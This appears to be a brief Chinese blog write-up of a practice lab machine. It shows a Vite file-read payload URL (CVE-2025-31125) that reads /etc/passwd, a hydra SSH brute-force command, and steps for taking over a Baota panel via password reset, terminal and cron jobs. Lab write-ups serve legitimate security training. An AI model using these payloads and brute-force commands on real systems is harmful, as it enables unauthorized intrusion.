Skip to main content

Pane12靶机-VITE

·27 words·1 min
Vite
IIIIIIIIIIII
Author
IIIIIIIIIIII
A little bit about you
Table of Contents

Pane12靶机-Vite-宝塔提权
#

1

这边直接进入8080端口打开vite

1

启动后访问3000端口是一个宝塔的界面

这里使用nuclei或者你搜索CVE搜索漏洞可以发现一个CVE-2025-31125

192.168.1.208:3000/@fs/etc/passwd?import&?inline=1.wasm?init

1

base64解密

1 

hydra -l welcome -P /usr/share/john/password.lst   ssh://192.168.1.208:22 -V -I -f -u -t 50 -e nsr

拿到一个用户爆破

1 

发现一个宝塔的程序可以先修改面板密码然后进入

1

进入后这里发现两个一个是直接打开终端

1

还有写计划任务

1

1

宝塔的计划任务目录在

/www/server/cron/

1

Related

CodeTwo靶机-HTB
·157 words·1 min
HTB
Docker-逃逸-LINux内核漏洞
·216 words·2 mins
Docker
Docker-逃逸-本身漏洞-CDK工具使用
·241 words·2 mins
Docker
Docker-逃逸-安全
·274 words·2 mins
Docker
云上服务-OSS存储桶渗透-AKSK两种利用特征
·272 words·2 mins
Oss Aksk